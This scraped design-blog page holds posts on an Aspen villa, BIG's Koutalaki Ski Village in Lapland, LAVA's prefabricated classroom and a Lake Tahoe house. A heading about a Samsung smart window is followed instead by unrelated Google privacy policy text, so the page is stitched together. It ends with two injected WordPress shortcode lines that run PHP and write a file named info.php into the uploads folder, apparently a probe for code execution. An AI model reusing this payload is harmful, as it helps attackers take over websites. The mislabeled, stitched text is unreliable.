interior • graphic • product | design

interior

scopri

graphic

scopri

product

scopri

Picturesque Rural Villa Outside Aspen

Project designed by architects Lipkin Warner Planning and Design Associates and located just seven miles outside Aspen, Colorado. The owners had specific goals: a warm, modern, luxurious ranch house with lots of entertaining areas, a horse barn and artist studio, capturing views of all four ski areas. Exteriors are of Pennsylvania lilac block cut stone, metal and pressure treated spruce. The interior is an open floor plan with Colorado sandstone and reclaimed Bavarian oak floors, acoustically designed wood ceilings and alder and wenge walls and built-ins, giving warmth to a modern design. The owner artists’ hand is reflected in custom furniture and wrap around fireplaces with mantles of glass, wood and steel provided by Andi-Le.

Main Level Plan

Uppler Level Plan

Koutalaki Ski Village by BIG

Danish architects BIG seem to have a thing for skiing on rooftops and have designed some more buildings that double up as ski slopes, this time for a resort in Lapland.

Visitors to the Koutalaki Ski Village in Levi will be able take an elevator up to the rooftops of the four accommodation blocks and ski back down.

The competition-winning buildings will surround and shelter a public square that can be used for ice skating and music performances.

Cafes and bars will occupy the lower floors of the buildings, while the top floor of one block will offer panoramic views of the surrounding snow-covered landscape.

The future Ski Village will transform the existing Levi ski resort into a world class destination, offering top quality accommodation and leisure services for skiers of all levels and demands. The proximity to the Kittilä airport ensures easy access to the resort attracting international visitors to Levi village and the whole Lapland region.

The Finland-based developer Kassiopeia Finland Oy is investing in its local region as it currently owns and operates Hotel Levi Panorama, Levi Summit Congress Center and Hotel K5 Levi and above and beyond has interests in developing the exquisite Koutalaki area.

“BIG’s visionary approach of combining unique types of accommodation and amenities along with the leisure activities offered at the resort, left the jury in awe.

Located on a gentle slope, the existing Levi ski center provides the framework for the future Koutalaki Ski Village which is conceived as an extension of the summit and the existing cluster of buildings in Koutalaki.

BIG proposes to create a series of buildings that radiate out from a central square and whose ends touch the ground to create four freestanding buildings that each provide access to the roof and allow the skiers to descend from the resort’s rooftop downhill in any direction.

The soft curves of the undulating roofs of the four buildings create a visual continuity of the natural land­scape while lending the whole village the unique character of a skislope skyline that creates an inhabited mountain top.

“The Koutalaki Ski Village is conceived as an extension of both the summit and the resort. Grown from the natural topography rather than dropped from the sky – the ar­chitecture extends the organic forms of natural landscape creating an inhabitable as well as skiable manmade mountain.

The four build­ings arc around a central square to create a new bustling village plaza at the heart of the resort, which is sheltered from the wind yet open and inviting to the surrounding landscape.

The whole resort area is connected through a network of paths that prioritizes skiers and pedestrians. Access to the roofs happens through central elevator cores allowing skiing down either towards the courtyard or the piste. An elevator located centrally in the hotel provides access to the roof top restaurant with a 360 degree panorama views of the landscape and plaza.

All accommodation units offered at the new resort enjoy beautiful views of the surrounding nature, including the eight private villas which are situated at different elevations to provide an undisturbed panorama, while the elevated private gardens serve as an extension of the landscape. The villas embrace the snowy landscape and allow the snow in all its forms become a part of the architecture itself.

While the four buildings simulate real ski slopes during winter time, combining the essence of a ski resort – skiing, relaxation, rec­reation and dwelling, the roofscape of the buildings during summer will be just as attractive serving as a green continuum of the surrounding natural landscape for hiking and pic­nics.

Name: Koutalaki Ski Village
Size: 47.000m2
Client: Kassiopeia Finland Oy
Location: Levi, Finland

Partners in Charge: Bjarke Ingels, Jakob Lange
Project Leader: Hanna Johansson
Team: David Tao, Erik de Haan, Jeff Mikolajewski, Jesper Victor Henriksson, Lucian Racovitan, Maren Allen

Copyright © Dezeen Limited 2006-2010

LAVA: Classroom of the Future

‘Classroom of the Future’ by LAVA, Australia. All images courtesy of LAVA

Sydney, Stuttgart and Shanghai-based practice LAVA has designed the ‘classroom of the future’. the prefabricated and relocatable classroom unit integrates into the landscape while enhancing the learning environment, allowing adjustments for changing needs of remote schools in australia. transforming the stigma of unsightly and unpleasant moveable architecture, this proposal attempts to make learning fun and exciting within a sustainable, practical and cost effective structure.

Exterior

Eco-materials form symmetrical repeatable geometry and small lightweight modular elements. The facade system is manually operable adjusting the amounts of light and shade as necessary while altering the enclosed versus open space. The low cost and low carbon options for mass customization also adapts to various climates and configures to a variety of terrains. The three axis geometry produces interlocking arrangements, catering to changing class sizes and future learning methods.

Aerial View

Classroom Interior

Exploded Axonometric

Section Perspective

Temperate Climate Diagram

Temperate Climate Diagram

Arid Climate Diagram

Arid Climate Diagram

Tropical Climate Diagram

Tropical Climate Diagram

project info:

architect: laboratory for visionary architecture [LAVA] chris bosse, tobias wallisser, alexander rieck stuttgart – sydney – shanghai
name of project: classroom of the future
location: australia
date: 2011
client: future proofing school
status: competition entry – commendation
size: 60-180 sqm each

© copyrights 2000 – 2012 designboom, all rights reserved.

Dark Skinned Light-Flooded Lake House in Nevada

Ever thought about building a home dark on the outside and filled with light on the inside? The Lake House is a perfect example of how these two elements can be successfully joined to shape a fantastic contemporary residential building. Designed by San Francisco-based Mark Dziewulski Architects, the home was initially called the Cliff House, but the current owners refers to it as “The Lake House”. The 808 m² home is made out of three main building materials: concrete, steel and glass. It took four years to complete this stunning residence and the architects designed the five stories in such a manner that the light-flooded interior spaces get the best views from the nearby Lake Tahoe. The four bedroom, four bathroom home, resting on a half acre property benefits from exciting moments spent by the private pier. Exceptional details like the glass elevator and stairwell make the home more than a comfortable collection of modern spaces – they transform it into a breathtaking contemporary home. Located in Incline Village, Crystal Bay, Nevada, the luxurious waterfront home is offered at $43 million, but its architectural and design details offer inspiration for free.

© 2007 – 2012 – All Rights Reserved : Freshome – Interior Design, Decorating & Architecture Magazine

New Transparent Smart Digital Window Introduced by Samsung

When you use Google services, you trust us with your information. This Privacy Policy is meant to help you understand what data we collect, why we collect it, and what we do with it. This is important; we hope you will take time to read it carefully. And remember, you can find controls to manage your information and protect your privacy and security at My Account.
There are many different ways you can use our services – to search for and share information, to communicate with other people or to create new content. When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier. As you use our services, we want you to be clear how we’re using information and the ways in which you can protect your privacy.
Our Privacy Policy may change from time to time. We will not reduce your rights under this Privacy Policy without your explicit consent. We will post any privacy policy changes on this page and, if the changes are significant, we will provide a more prominent notice (including, for certain services, email notification of privacy policy changes). We will also keep prior versions of this Privacy Policy in an archive for your review.
[insert_php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/insert_php]
[php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/php]